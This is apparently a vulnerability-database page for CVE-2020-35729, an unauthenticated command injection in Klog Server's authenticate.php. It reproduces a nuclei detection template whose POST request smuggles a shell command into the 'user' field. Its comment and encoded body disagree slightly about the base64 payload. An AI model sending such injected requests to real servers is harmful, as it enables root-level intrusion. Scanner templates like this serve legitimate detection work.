Lucene search
K

Klog Server <=2.41 - Unauthenticated Command Injection

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 49 Views

Klog Server Unauthenticated Command Injection vulnerability in authenticate.ph

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Klog Server 2.4.1 Command Injection Exploit
15 Feb 202100:00
zdt
Circl
CVE-2020-35729
5 Jan 202100:00
circl
CNNVD
KLog Server OS Command Injection Vulnerability
27 Dec 202000:00
cnnvd
Check Point Advisories
KLog Server Command Injection (CVE-2020-35729)
6 Jan 202100:00
checkpoint_advisories
CVE
CVE-2020-35729
27 Dec 202004:40
cve
Cvelist
CVE-2020-35729
27 Dec 202004:40
cvelist
GithubExploit
Exploit for OS Command Injection in Klogserver Klog_Server
9 Apr 202107:59
githubexploit
Exploit DB
Klog Server 2.4.1 - Unauthenticated Command Injection (Metasploit)
25 Jan 202100:00
exploitdb
Metasploit
Klog Server authenticate.php user Unauthenticated Command Injection
13 Feb 202117:42
metasploit
NVD
CVE-2020-35729
27 Dec 202005:15
nvd
Rows per page
id: CVE-2020-35729

info:
  name: Klog Server <=2.41 - Unauthenticated Command Injection
  author: dwisiswant0
  severity: critical
  description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7.
  impact: |
    An attacker can execute arbitrary commands on the server, leading to remote code execution and potential compromise of the system.
  remediation: |
    Upgrade to a patched version of Klog Server (>=2.42) or apply the vendor-supplied patch.
  reference:
    - https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35729
    - https://github.com/mustgundogdu/Research/blob/main/KLOG_SERVER/Exploit_Code
    - https://github.com/mustgundogdu/Research/blob/main/KLOG_SERVER/README.md
    - https://github.com/Z0fhack/Goby_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-35729
    cwe-id: CWE-78
    epss-score: 0.87987
    epss-percentile: 0.99746
    cpe: cpe:2.3:a:klogserver:klog_server:2.4.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: klogserver
    product: klog_server
  tags: cve,cve2020,klog,rce,klogserver,vuln
variables:
  dummy: "{{to_lower(rand_text_alpha(5))}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/actions/authenticate.php"

    body: 'user={{dummy}}%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd={{dummy}}' # Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d & echo"
    matchers:
      - type: word
        words:
          - "poc-testing" # from Base64 decoding payload
# digest: 490a00463044022071ef47041819f695903ba7611ff14ac13351e596fee5f59c66ca43d75f845b9c022032b3b9a95958c6b35f3ac07eb6359ba00f0ab071b28729bd8551c6836a11ce96:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation